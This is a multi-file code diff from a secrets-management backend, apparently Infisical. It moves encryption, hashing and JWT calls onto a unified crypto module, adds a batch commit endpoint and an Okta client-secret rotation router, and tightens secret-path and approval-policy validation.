@@ -200,27 +219,30 @@ export const encryptSecret = (encKey: string, key: string, value?: string, comme
 };
 
 export const decryptSecret = (decryptKey: string, encSecret: TSecrets) => {
-  const secretKey = decryptSymmetric128BitHexKeyUTF8({
+  const secretKey = crypto.encryption().symmetric().decrypt({
     key: decryptKey,
     ciphertext: encSecret.secretKeyCiphertext,
     tag: encSecret.secretKeyTag,
-    iv: encSecret.secretKeyIV
+    iv: encSecret.secretKeyIV,
+    keySize: SymmetricKeySize.Bits128
   });
 
-  const secretValue = decryptSymmetric128BitHexKeyUTF8({
+  const secretValue = crypto.encryption().symmetric().decrypt({
     key: decryptKey,
     ciphertext: encSecret.secretValueCiphertext,
     tag: encSecret.secretValueTag,
-    iv: encSecret.secretValueIV
+    iv: encSecret.secretValueIV,
+    keySize: SymmetricKeySize.Bits128
   });
 
   const secretComment =
     encSecret.secretCommentIV && encSecret.secretCommentTag && encSecret.secretCommentCiphertext
-      ? decryptSymmetric128BitHexKeyUTF8({
+      ? crypto.encryption().symmetric().decrypt({
           key: decryptKey,
           ciphertext: encSecret.secretCommentCiphertext,
           tag: encSecret.secretCommentTag,
-          iv: encSecret.secretCommentIV
+          iv: encSecret.secretCommentIV,
+          keySize: SymmetricKeySize.Bits128
         })
       : "";
 

backend/src/db/seeds/1-user.ts

@@ -1,5 +1,9 @@
 import { Knex } from "knex";
 
+import { crypto } from "@app/lib/crypto";
+import { initLogger } from "@app/lib/logger";
+import { superAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
+
 import { AuthMethod } from "../../services/auth/auth-type";
 import { TableName } from "../schemas";
 import { generateUserSrpKeys, seedData1 } from "../seed-data";
@@ -10,6 +14,11 @@ export async function seed(knex: Knex): Promise<void> {
   await knex(TableName.UserEncryptionKey).del();
   await knex(TableName.SuperAdmin).del();
 
+  initLogger();
+
+  const superAdminDAL = superAdminDALFactory(knex);
+  await crypto.initialize(superAdminDAL);
+
   await knex(TableName.SuperAdmin).insert([
     // eslint-disable-next-line
     // @ts-ignore

backend/src/db/seeds/3-project.ts

@@ -1,8 +1,6 @@
-import crypto from "node:crypto";
-
 import { Knex } from "knex";
 
-import { encryptSymmetric128BitHexKeyUTF8 } from "@app/lib/crypto";
+import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
 
 import { ProjectMembershipRole, ProjectType, SecretEncryptionAlgo, SecretKeyEncoding, TableName } from "../schemas";
 import { buildUserProjectKey, getUserPrivateKey, seedData1 } from "../seed-data";
@@ -72,7 +70,11 @@ export async function seed(knex: Knex): Promise<void> {
   const encKey = process.env.ENCRYPTION_KEY;
   if (!encKey) throw new Error("Missing ENCRYPTION_KEY");
   const salt = crypto.randomBytes(16).toString("base64");
-  const secretBlindIndex = encryptSymmetric128BitHexKeyUTF8(salt, encKey);
+  const secretBlindIndex = crypto.encryption().symmetric().encrypt({
+    plaintext: salt,
+    key: encKey,
+    keySize: SymmetricKeySize.Bits128
+  });
   // insert secret blind index for project
   await knex(TableName.SecretBlindIndex).insert({
     projectId: project.id,

backend/src/db/seeds/5-machine-identity.ts

@@ -1,6 +1,7 @@
-import bcrypt from "bcrypt";
 import { Knex } from "knex";
 
+import { crypto } from "@app/lib/crypto/cryptography";
+
 import { IdentityAuthMethod, OrgMembershipRole, ProjectMembershipRole, TableName } from "../schemas";
 import { seedData1 } from "../seed-data";
 
@@ -54,7 +55,9 @@ export async function seed(knex: Knex): Promise<void> {
       }
     ])
     .returning("*");
-  const clientSecretHash = await bcrypt.hash(seedData1.machineIdentity.clientCredentials.secret, 10);
+
+  const clientSecretHash = await crypto.hashing().createHash(seedData1.machineIdentity.clientCredentials.secret, 10);
+
   await knex(TableName.IdentityUaClientSecret).insert([
     {
       identityUAId: identityUa[0].id,

backend/src/ee/routes/est/certificate-est-router.ts

@@ -1,7 +1,7 @@
-import bcrypt from "bcrypt";
 import { z } from "zod";
 
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, UnauthorizedError } from "@app/lib/errors";
 import { readLimit, writeLimit } from "@app/server/config/rateLimiter";
 
@@ -85,7 +85,7 @@ export const registerCertificateEstRouter = async (server: FastifyZodProvider) =
       });
     }
 
-    const isPasswordValid = await bcrypt.compare(password, estConfig.hashedPassphrase);
+    const isPasswordValid = await crypto.hashing().compareHash(password, estConfig.hashedPassphrase);
     if (!isPasswordValid) {
       throw new UnauthorizedError({
         message: "Invalid credentials"

backend/src/ee/routes/v1/access-approval-policy-router.ts

@@ -2,6 +2,7 @@ import { nanoid } from "nanoid";
 import { z } from "zod";
 
 import { ApproverType, BypasserType } from "@app/ee/services/access-approval-policy/access-approval-policy-types";
+import { removeTrailingSlash } from "@app/lib/fn";
 import { EnforcementLevel } from "@app/lib/types";
 import { readLimit, writeLimit } from "@app/server/config/rateLimiter";
 import { verifyAuth } from "@app/server/plugins/auth/verify-auth";
@@ -19,7 +20,7 @@ export const registerAccessApprovalPolicyRouter = async (server: FastifyZodProvi
       body: z.object({
         projectSlug: z.string().trim(),
         name: z.string().optional(),
-        secretPath: z.string().trim().default("/"),
+        secretPath: z.string().trim().min(1, { message: "Secret path cannot be empty" }).transform(removeTrailingSlash),
         environment: z.string(),
         approvers: z
           .discriminatedUnion("type", [
@@ -174,8 +175,9 @@ export const registerAccessApprovalPolicyRouter = async (server: FastifyZodProvi
         secretPath: z
           .string()
           .trim()
+          .min(1, { message: "Secret path cannot be empty" })
           .optional()
-          .transform((val) => (val === "" ? "/" : val)),
+          .transform((val) => (val ? removeTrailingSlash(val) : val)),
         approvers: z
           .discriminatedUnion("type", [
             z.object({

backend/src/ee/routes/v1/pit-router.ts

@@ -3,11 +3,14 @@ import { z } from "zod";
 
 import { EventType } from "@app/ee/services/audit-log/audit-log-types";
 import { removeTrailingSlash } from "@app/lib/fn";
-import { readLimit } from "@app/server/config/rateLimiter";
+import { isValidFolderName } from "@app/lib/validator";
+import { readLimit, secretsLimit } from "@app/server/config/rateLimiter";
+import { SecretNameSchema } from "@app/server/lib/schemas";
 import { verifyAuth } from "@app/server/plugins/auth/verify-auth";
 import { booleanSchema } from "@app/server/routes/sanitizedSchemas";
 import { AuthMode } from "@app/services/auth/auth-type";
 import { commitChangesResponseSchema, resourceChangeSchema } from "@app/services/folder-commit/folder-commit-schemas";
+import { ResourceMetadataSchema } from "@app/services/resource-metadata/resource-metadata-schema";
 
 const commitHistoryItemSchema = z.object({
   id: z.string(),
@@ -413,4 +416,166 @@ export const registerPITRouter = async (server: FastifyZodProvider) => {
       return result;
     }
   });
+
+  server.route({
+    method: "POST",
+    url: "/batch/commit",
+    config: {
+      rateLimit: secretsLimit
+    },
+    schema: {
+      hide: true,
+      description: "Commit changes",
+      security: [
+        {
+          bearerAuth: []
+        }
+      ],
+      body: z.object({
+        projectId: z.string().trim(),
+        environment: z.string().trim(),
+        secretPath: z.string().trim().default("/").transform(removeTrailingSlash),
+        message: z
+          .string()
+          .trim()
+          .min(1)
+          .max(255)
+          .refine((message) => message.trim() !== "", {
+            message: "Commit message cannot be empty"
+          }),
+        changes: z.object({
+          secrets: z.object({
+            create: z
+              .array(
+                z.object({
+                  secretKey: SecretNameSchema,
+                  secretValue: z.string().transform((val) => (val.at(-1) === "\n" ? `${val.trim()}\n` : val.trim())),
+                  secretComment: z.string().trim().optional().default(""),
+                  skipMultilineEncoding: z.boolean().optional(),
+                  metadata: z.record(z.string()).optional(),
+                  secretMetadata: ResourceMetadataSchema.optional(),
+                  tagIds: z.string().array().optional()
+                })
+              )
+              .optional(),
+            update: z
+              .array(
+                z.object({
+                  secretKey: SecretNameSchema,
+                  newSecretName: SecretNameSchema.optional(),
+                  secretValue: z
+                    .string()
+                    .transform((val) => (val.at(-1) === "\n" ? `${val.trim()}\n` : val.trim()))
+                    .optional(),
+                  secretComment: z.string().trim().optional().default(""),
+                  skipMultilineEncoding: z.boolean().optional(),
+                  metadata: z.record(z.string()).optional(),
+                  secretMetadata: ResourceMetadataSchema.optional(),
+                  tagIds: z.string().array().optional()
+                })
+              )
+              .optional(),
+            delete: z
+              .array(
+                z.object({
+                  secretKey: SecretNameSchema
+                })
+              )
+              .optional()
+          }),
+          folders: z.object({
+            create: z
+              .array(
+                z.object({
+                  folderName: z
+                    .string()
+                    .trim()
+                    .refine((name) => isValidFolderName(name), {
+                      message: "Invalid folder name. Only alphanumeric characters, dashes, and underscores are allowed."
+                    }),
+                  description: z.string().optional()
+                })
+              )
+              .optional(),
+            update: z
+              .array(
+                z.object({
+                  folderName: z
+                    .string()
+                    .trim()
+                    .refine((name) => isValidFolderName(name), {
+                      message: "Invalid folder name. Only alphanumeric characters, dashes, and underscores are allowed."
+                    }),
+                  description: z.string().nullable().optional(),
+                  id: z.string()
+                })
+              )
+              .optional(),
+            delete: z
+              .array(
+                z.object({
+                  folderName: z
+                    .string()
+                    .trim()
+                    .refine((name) => isValidFolderName(name), {
+                      message: "Invalid folder name. Only alphanumeric characters, dashes, and underscores are allowed."
+                    }),
+                  id: z.string()
+                })
+              )
+              .optional()
+          })
+        })
+      }),
+      response: {
+        200: z.object({
+          message: z.string()
+        })
+      }
+    },
+    onRequest: verifyAuth([AuthMode.JWT]),
+    handler: async (req) => {
+      const result = await server.services.pit.processNewCommitRaw({
+        actorId: req.permission.id,
+        actor: req.permission.type,
+        actorOrgId: req.permission.orgId,
+        actorAuthMethod: req.permission.authMethod,
+        projectId: req.body.projectId,
+        environment: req.body.environment,
+        secretPath: req.body.secretPath,
+        message: req.body.message,
+        changes: {
+          secrets: req.body.changes.secrets,
+          folders: req.body.changes.folders
+        }
+      });
+
+      await server.services.auditLog.createAuditLog({
+        ...req.auditLogInfo,
+        projectId: req.body.projectId,
+        event: {
+          type: EventType.PIT_PROCESS_NEW_COMMIT_RAW,
+          metadata: {
+            commitId: result.commitId,
+            approvalId: result.approvalId,
+            projectId: req.body.projectId,
+            environment: req.body.environment,
+            secretPath: req.body.secretPath,
+            message: req.body.message
+          }
+        }
+      });
+
+      for await (const event of result.secretMutationEvents) {
+        await server.services.auditLog.createAuditLog({
+          ...req.auditLogInfo,
+          orgId: req.permission.orgId,
+          projectId: req.body.projectId,
+          event
+        });
+      }
+
+      return { message: "success" };
+    }
+  });
 };

backend/src/ee/routes/v1/secret-approval-policy-router.ts

@@ -23,10 +23,8 @@ export const registerSecretApprovalPolicyRouter = async (server: FastifyZodProvi
         environment: z.string(),
         secretPath: z
           .string()
-          .optional()
-          .nullable()
-          .default("/")
-          .transform((val) => (val ? removeTrailingSlash(val) : val)),
+          .min(1, { message: "Secret path cannot be empty" })
+          .transform((val) => removeTrailingSlash(val)),
         approvers: z
           .discriminatedUnion("type", [
             z.object({ type: z.literal(ApproverType.Group), id: z.string() }),
@@ -100,10 +98,10 @@ export const registerSecretApprovalPolicyRouter = async (server: FastifyZodProvi
         approvals: z.number().min(1).default(1),
         secretPath: z
           .string()
+          .trim()
+          .min(1, { message: "Secret path cannot be empty" })
           .optional()
-          .nullable()
-          .transform((val) => (val ? removeTrailingSlash(val) : val))
-          .transform((val) => (val === "" ? "/" : val)),
+          .transform((val) => (val ? removeTrailingSlash(val) : undefined)),
         enforcementLevel: z.nativeEnum(EnforcementLevel).optional(),
         allowedSelfApprovals: z.boolean().default(true)
       }),

backend/src/ee/routes/v1/secret-approval-request-router.ts

@@ -58,7 +58,7 @@ export const registerSecretApprovalRequestRouter = async (server: FastifyZodProv
               deletedAt: z.date().nullish(),
               allowedSelfApprovals: z.boolean()
             }),
-            committerUser: approvalRequestUser,
+            committerUser: approvalRequestUser.nullish(),
             commits: z.object({ op: z.string(), secretId: z.string().nullable().optional() }).array(),
             environment: z.string(),
             reviewers: z.object({ userId: z.string(), status: z.string() }).array(),
@@ -308,7 +308,7 @@ export const registerSecretApprovalRequestRouter = async (server: FastifyZodProv
               }),
               environment: z.string(),
               statusChangedByUser: approvalRequestUser.optional(),
-              committerUser: approvalRequestUser,
+              committerUser: approvalRequestUser.nullish(),
               reviewers: approvalRequestUser.extend({ status: z.string(), comment: z.string().optional() }).array(),
               secretPath: z.string(),
               commits: secretRawSchema

backend/src/ee/routes/v2/secret-rotation-v2-routers/index.ts

@@ -6,6 +6,7 @@ import { registerAzureClientSecretRotationRouter } from "./azure-client-secret-r
 import { registerLdapPasswordRotationRouter } from "./ldap-password-rotation-router";
 import { registerMsSqlCredentialsRotationRouter } from "./mssql-credentials-rotation-router";
 import { registerMySqlCredentialsRotationRouter } from "./mysql-credentials-rotation-router";
+import { registerOktaClientSecretRotationRouter } from "./okta-client-secret-rotation-router";
 import { registerOracleDBCredentialsRotationRouter } from "./oracledb-credentials-rotation-router";
 import { registerPostgresCredentialsRotationRouter } from "./postgres-credentials-rotation-router";
 
@@ -22,5 +23,6 @@ export const SECRET_ROTATION_REGISTER_ROUTER_MAP: Record<
   [SecretRotation.Auth0ClientSecret]: registerAuth0ClientSecretRotationRouter,
   [SecretRotation.AzureClientSecret]: registerAzureClientSecretRotationRouter,
   [SecretRotation.AwsIamUserSecret]: registerAwsIamUserSecretRotationRouter,
-  [SecretRotation.LdapPassword]: registerLdapPasswordRotationRouter
+  [SecretRotation.LdapPassword]: registerLdapPasswordRotationRouter,
+  [SecretRotation.OktaClientSecret]: registerOktaClientSecretRotationRouter
 };

backend/src/ee/routes/v2/secret-rotation-v2-routers/okta-client-secret-rotation-router.ts

@@ -0,0 +1,19 @@
+import {
+  CreateOktaClientSecretRotationSchema,
+  OktaClientSecretRotationGeneratedCredentialsSchema,
+  OktaClientSecretRotationSchema,
+  UpdateOktaClientSecretRotationSchema
+} from "@app/ee/services/secret-rotation-v2/okta-client-secret";
+import { SecretRotation } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-enums";
+
+import { registerSecretRotationEndpoints } from "./secret-rotation-v2-endpoints";
+
+export const registerOktaClientSecretRotationRouter = async (server: FastifyZodProvider) =>
+  registerSecretRotationEndpoints({
+    type: SecretRotation.OktaClientSecret,
+    server,
+    responseSchema: OktaClientSecretRotationSchema,
+    createSchema: CreateOktaClientSecretRotationSchema,
+    updateSchema: UpdateOktaClientSecretRotationSchema,
+    generatedCredentialsSchema: OktaClientSecretRotationGeneratedCredentialsSchema
+  });

backend/src/ee/routes/v2/secret-rotation-v2-routers/secret-rotation-v2-router.ts

@@ -7,6 +7,7 @@ import { AzureClientSecretRotationListItemSchema } from "@app/ee/services/secret
 import { LdapPasswordRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/ldap-password";
 import { MsSqlCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/mssql-credentials";
 import { MySqlCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/mysql-credentials";
+import { OktaClientSecretRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/okta-client-secret";
 import { OracleDBCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/oracledb-credentials";
 import { PostgresCredentialsRotationListItemSchema } from "@app/ee/services/secret-rotation-v2/postgres-credentials";
 import { SecretRotationV2Schema } from "@app/ee/services/secret-rotation-v2/secret-rotation-v2-union-schema";
@@ -23,7 +24,8 @@ const SecretRotationV2OptionsSchema = z.discriminatedUnion("type", [
   Auth0ClientSecretRotationListItemSchema,
   AzureClientSecretRotationListItemSchema,
   AwsIamUserSecretRotationListItemSchema,
-  LdapPasswordRotationListItemSchema
+  LdapPasswordRotationListItemSchema,
+  OktaClientSecretRotationListItemSchema
 ]);
 
 export const registerSecretRotationV2Router = async (server: FastifyZodProvider) => {

backend/src/ee/services/access-approval-policy/access-approval-policy-dal.ts

@@ -53,7 +53,7 @@ export interface TAccessApprovalPolicyDALFactory
       envId: string;
       enforcementLevel: string;
       allowedSelfApprovals: boolean;
-      secretPath?: string | null | undefined;
+      secretPath: string;
       deletedAt?: Date | null | undefined;
       environment: {
         id: string;
@@ -93,7 +93,7 @@ export interface TAccessApprovalPolicyDALFactory
         envId: string;
         enforcementLevel: string;
         allowedSelfApprovals: boolean;
-        secretPath?: string | null | undefined;
+        secretPath: string;
         deletedAt?: Date | null | undefined;
         environment: {
           id: string;
@@ -116,7 +116,7 @@ export interface TAccessApprovalPolicyDALFactory
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
     deletedAt?: Date | null | undefined;
   }>;
   findLastValidPolicy: (
@@ -138,7 +138,7 @@ export interface TAccessApprovalPolicyDALFactory
         envId: string;
         enforcementLevel: string;
         allowedSelfApprovals: boolean;
-        secretPath?: string | null | undefined;
+        secretPath: string;
         deletedAt?: Date | null | undefined;
       }
     | undefined
@@ -190,7 +190,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
     deletedAt?: Date | null | undefined;
   }>;
   deleteAccessApprovalPolicy: ({
@@ -214,7 +214,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
     deletedAt?: Date | null | undefined;
     environment: {
       id: string;
@@ -252,7 +252,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
     deletedAt?: Date | null | undefined;
   }>;
   getAccessApprovalPolicyByProjectSlug: ({
@@ -286,7 +286,7 @@ export interface TAccessApprovalPolicyServiceFactory {
       envId: string;
       enforcementLevel: string;
       allowedSelfApprovals: boolean;
-      secretPath?: string | null | undefined;
+      secretPath: string;
       deletedAt?: Date | null | undefined;
       environment: {
         id: string;
@@ -337,7 +337,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
     deletedAt?: Date | null | undefined;
     environment: {
       id: string;

backend/src/ee/services/access-approval-policy/access-approval-policy-service.ts

@@ -60,6 +60,26 @@ export const accessApprovalPolicyServiceFactory = ({
   accessApprovalRequestReviewerDAL,
   orgMembershipDAL
 }: TAccessApprovalPolicyServiceFactoryDep): TAccessApprovalPolicyServiceFactory => {
+  const $policyExists = async ({
+    envId,
+    secretPath,
+    policyId
+  }: {
+    envId: string;
+    secretPath: string;
+    policyId?: string;
+  }) => {
+    const policy = await accessApprovalPolicyDAL
+      .findOne({
+        envId,
+        secretPath,
+        deletedAt: null
+      })
+      .catch(() => null);
+
+    return policyId ? policy && policy.id !== policyId : Boolean(policy);
+  };
+
   const createAccessApprovalPolicy: TAccessApprovalPolicyServiceFactory["createAccessApprovalPolicy"] = async ({
     name,
     actor,
@@ -106,6 +126,12 @@ export const accessApprovalPolicyServiceFactory = ({
     const env = await projectEnvDAL.findOne({ slug: environment, projectId: project.id });
     if (!env) throw new NotFoundError({ message: `Environment with slug '${environment}' not found` });
 
+    if (await $policyExists({ envId: env.id, secretPath })) {
+      throw new BadRequestError({
+        message: `A policy for secret path '${secretPath}' already exists in environment '${environment}'`
+      });
+    }
+
     let approverUserIds = userApprovers;
     if (userApproverNames.length) {
       const approverUsersInDB = await userDAL.find({
@@ -279,7 +305,11 @@ export const accessApprovalPolicyServiceFactory = ({
     ) as { username: string; sequence?: number }[];
 
     const accessApprovalPolicy = await accessApprovalPolicyDAL.findById(policyId);
-    if (!accessApprovalPolicy) throw new BadRequestError({ message: "Approval policy not found" });
+    if (!accessApprovalPolicy) {
+      throw new NotFoundError({
+        message: `Access approval policy with ID '${policyId}' not found`
+      });
+    }
 
     const currentApprovals = approvals || accessApprovalPolicy.approvals;
     if (
@@ -290,9 +320,18 @@ export const accessApprovalPolicyServiceFactory = ({
       throw new BadRequestError({ message: "Approvals cannot be greater than approvers" });
     }
 
-    if (!accessApprovalPolicy) {
-      throw new NotFoundError({ message: `Secret approval policy with ID '${policyId}' not found` });
+    if (
+      await $policyExists({
+        envId: accessApprovalPolicy.envId,
+        secretPath: secretPath || accessApprovalPolicy.secretPath,
+        policyId: accessApprovalPolicy.id
+      })
+    ) {
+      throw new BadRequestError({
+        message: `A policy for secret path '${secretPath}' already exists in environment '${accessApprovalPolicy.environment.slug}'`
+      });
     }
+
     const { permission } = await permissionService.getProjectPermission({
       actor,
       actorId,

backend/src/ee/services/access-approval-policy/access-approval-policy-types.ts

@@ -122,7 +122,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
     deletedAt?: Date | null | undefined;
   }>;
   deleteAccessApprovalPolicy: ({
@@ -146,7 +146,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
     deletedAt?: Date | null | undefined;
     environment: {
       id: string;
@@ -218,7 +218,7 @@ export interface TAccessApprovalPolicyServiceFactory {
       envId: string;
       enforcementLevel: string;
       allowedSelfApprovals: boolean;
-      secretPath?: string | null | undefined;
+      secretPath: string;
       deletedAt?: Date | null | undefined;
       environment: {
         id: string;
@@ -269,7 +269,7 @@ export interface TAccessApprovalPolicyServiceFactory {
     envId: string;
     enforcementLevel: string;
     allowedSelfApprovals: boolean;
-    secretPath?: string | null | undefined;
+    secretPath: string;
     deletedAt?: Date | null | undefined;
     environment: {
       id: string;

backend/src/ee/services/access-approval-request/access-approval-request-service.ts

@@ -354,11 +354,17 @@ export const accessApprovalRequestServiceFactory = ({
       status === ApprovalStatus.APPROVED;
 
     const isApprover = policy.approvers.find((approver) => approver.userId === actorId);
-    // If user is (not an approver OR cant self approve) AND can't bypass policy
-    if ((!isApprover || (!policy.allowedSelfApprovals && isSelfApproval)) && cannotBypassUnderSoftEnforcement) {
-      throw new BadRequestError({
-        message: "Failed to review access approval request. Users are not authorized to review their own request."
-      });
+
+    const isSelfRejection = isSelfApproval && status === ApprovalStatus.REJECTED;
+
+    // users can always reject (cancel) their own requests
+    if (!isSelfRejection) {
+      // If user is (not an approver OR cant self approve) AND can't bypass policy
+      if ((!isApprover || (!policy.allowedSelfApprovals && isSelfApproval)) && cannotBypassUnderSoftEnforcement) {
+        throw new BadRequestError({
+          message: "Failed to review access approval request. Users are not authorized to review their own request."
+        });
+      }
     }
 
     if (
@@ -414,7 +420,7 @@ export const accessApprovalRequestServiceFactory = ({
       );
 
       // Only throw if actor is not the approver and not bypassing
-      if (!isApproverOfTheSequence && !isBreakGlassApprovalAttempt) {
+      if (!isApproverOfTheSequence && !isBreakGlassApprovalAttempt && !isSelfRejection) {
         throw new BadRequestError({ message: "You are not a reviewer in this step" });
       }
     }

backend/src/ee/services/app-connections/oracledb/oracledb-connection-schemas.ts

@@ -45,7 +45,10 @@ export const ValidateOracleDBConnectionCredentialsSchema = z.discriminatedUnion(
 ]);
 
 export const CreateOracleDBConnectionSchema = ValidateOracleDBConnectionCredentialsSchema.and(
-  GenericCreateAppConnectionFieldsSchema(AppConnection.OracleDB, { supportsPlatformManagedCredentials: true })
+  GenericCreateAppConnectionFieldsSchema(AppConnection.OracleDB, {
+    supportsPlatformManagedCredentials: true,
+    supportsGateways: true
+  })
 );
 
 export const UpdateOracleDBConnectionSchema = z
@@ -54,7 +57,12 @@ export const UpdateOracleDBConnectionSchema = z
       AppConnections.UPDATE(AppConnection.OracleDB).credentials
     )
   })
-  .and(GenericUpdateAppConnectionFieldsSchema(AppConnection.OracleDB, { supportsPlatformManagedCredentials: true }));
+  .and(
+    GenericUpdateAppConnectionFieldsSchema(AppConnection.OracleDB, {
+      supportsPlatformManagedCredentials: true,
+      supportsGateways: true
+    })
+  );
 
 export const OracleDBConnectionListItemSchema = z.object({
   name: z.literal("OracleDB"),

backend/src/ee/services/assume-privilege/assume-privilege-service.ts

@@ -1,7 +1,7 @@
 import { ForbiddenError } from "@casl/ability";
-import jwt from "jsonwebtoken";
 
 import { getConfig } from "@app/lib/config/env";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { ForbiddenRequestError, NotFoundError } from "@app/lib/errors";
 import { ActorType } from "@app/services/auth/auth-type";
 import { TProjectDALFactory } from "@app/services/project/project-dal";
@@ -62,7 +62,7 @@ export const assumePrivilegeServiceFactory = ({
     });
 
     const appCfg = getConfig();
-    const assumePrivilegesToken = jwt.sign(
+    const assumePrivilegesToken = crypto.jwt().sign(
       {
         tokenVersionId,
         actorType: targetActorType,
@@ -82,7 +82,7 @@ export const assumePrivilegeServiceFactory = ({
     tokenVersionId
   ) => {
     const appCfg = getConfig();
-    const decodedToken = jwt.verify(token, appCfg.AUTH_SECRET) as {
+    const decodedToken = crypto.jwt().verify(token, appCfg.AUTH_SECRET) as {
       tokenVersionId: string;
       projectId: string;
       requesterId: string;

backend/src/ee/services/audit-log-stream/audit-log-stream-service.ts

@@ -4,7 +4,7 @@ import { RawAxiosRequestHeaders } from "axios";
 import { SecretKeyEncoding } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
 import { request } from "@app/lib/config/request";
-import { infisicalSymmetricDecrypt, infisicalSymmetricEncypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { BadRequestError, NotFoundError, UnauthorizedError } from "@app/lib/errors";
 import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator";
 
@@ -86,7 +86,10 @@ export const auditLogStreamServiceFactory = ({
       .catch((err) => {
         throw new BadRequestError({ message: `Failed to connect with upstream source: ${(err as Error)?.message}` });
       });
-    const encryptedHeaders = headers ? infisicalSymmetricEncypt(JSON.stringify(headers)) : undefined;
+
+    const encryptedHeaders = headers
+      ? crypto.encryption().symmetric().encryptWithRootEncryptionKey(JSON.stringify(headers))
+      : undefined;
     const logStream = await auditLogStreamDAL.create({
       orgId: actorOrgId,
       url,
@@ -152,7 +155,9 @@ export const auditLogStreamServiceFactory = ({
         throw new Error(`Failed to connect with the source ${(err as Error)?.message}`);
       });
 
-    const encryptedHeaders = headers ? infisicalSymmetricEncypt(JSON.stringify(headers)) : undefined;
+    const encryptedHeaders = headers
+      ? crypto.encryption().symmetric().encryptWithRootEncryptionKey(JSON.stringify(headers))
+      : undefined;
     const updatedLogStream = await auditLogStreamDAL.updateById(id, {
       url,
       ...(encryptedHeaders
@@ -205,12 +210,15 @@ export const auditLogStreamServiceFactory = ({
     const headers =
       logStream?.encryptedHeadersCiphertext && logStream?.encryptedHeadersIV && logStream?.encryptedHeadersTag
         ? (JSON.parse(
-            infisicalSymmetricDecrypt({
-              tag: logStream.encryptedHeadersTag,
-              iv: logStream.encryptedHeadersIV,
-              ciphertext: logStream.encryptedHeadersCiphertext,
-              keyEncoding: logStream.encryptedHeadersKeyEncoding as SecretKeyEncoding
-            })
+            crypto
+              .encryption()
+              .symmetric()
+              .decryptWithRootEncryptionKey({
+                tag: logStream.encryptedHeadersTag,
+                iv: logStream.encryptedHeadersIV,
+                ciphertext: logStream.encryptedHeadersCiphertext,
+                keyEncoding: logStream.encryptedHeadersKeyEncoding as SecretKeyEncoding
+              })
           ) as LogStreamHeaders[])
         : undefined;
 

backend/src/ee/services/audit-log/audit-log-queue.ts

@@ -3,7 +3,7 @@ import { AxiosError, RawAxiosRequestHeaders } from "axios";
 import { SecretKeyEncoding } from "@app/db/schemas";
 import { getConfig } from "@app/lib/config/env";
 import { request } from "@app/lib/config/request";
-import { infisicalSymmetricDecrypt } from "@app/lib/crypto/encryption";
+import { crypto } from "@app/lib/crypto/cryptography";
 import { logger } from "@app/lib/logger";
 import { QueueJobs, QueueName, TQueueServiceFactory } from "@app/queue";
 import { TProjectDALFactory } from "@app/services/project/project-dal";
@@ -114,12 +114,15 @@ export const auditLogQueueServiceFactory = async ({
               const streamHeaders =
                 encryptedHeadersIV && encryptedHeadersCiphertext && encryptedHeadersTag
                   ? (JSON.parse(
-                      infisicalSymmetricDecrypt({
-                        keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
-                        iv: encryptedHeadersIV,
-                        tag: encryptedHeadersTag,
-                        ciphertext: encryptedHeadersCiphertext
-                      })
+                      crypto
+                        .encryption()
+                        .symmetric()
+                        .decryptWithRootEncryptionKey({
+                          keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
+                          iv: encryptedHeadersIV,
+                          tag: encryptedHeadersTag,
+                          ciphertext: encryptedHeadersCiphertext
+                        })
                     ) as LogStreamHeaders[])
                   : [];
 
@@ -216,12 +219,15 @@ export const auditLogQueueServiceFactory = async ({
           const streamHeaders =
             encryptedHeadersIV && encryptedHeadersCiphertext && encryptedHeadersTag
               ? (JSON.parse(
-                  infisicalSymmetricDecrypt({
-                    keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
-                    iv: encryptedHeadersIV,
-                    tag: encryptedHeadersTag,
-                    ciphertext: encryptedHeadersCiphertext
-                  })
+                  crypto
+                    .encryption()
+                    .symmetric()
+                    .decryptWithRootEncryptionKey({
+                      keyEncoding: encryptedHeadersKeyEncoding as SecretKeyEncoding,
+                      iv: encryptedHeadersIV,
+                      tag: encryptedHeadersTag,
+                      ciphertext: encryptedHeadersCiphertext
+                    })
                 ) as LogStreamHeaders[])
               : [];
 

backend/src/ee/services/audit-log/audit-log-types.ts

@@ -449,6 +449,7 @@ export enum EventType {
   PIT_REVERT_COMMIT = "pit-revert-commit",
   PIT_GET_FOLDER_STATE = "pit-get-folder-state",
   PIT_COMPARE_FOLDER_STATES = "pit-compare-folder-states",
+  PIT_PROCESS_NEW_COMMIT_RAW = "pit-process-new-commit-raw",
   SECRET_SCANNING_DATA_SOURCE_LIST = "secret-scanning-data-source-list",
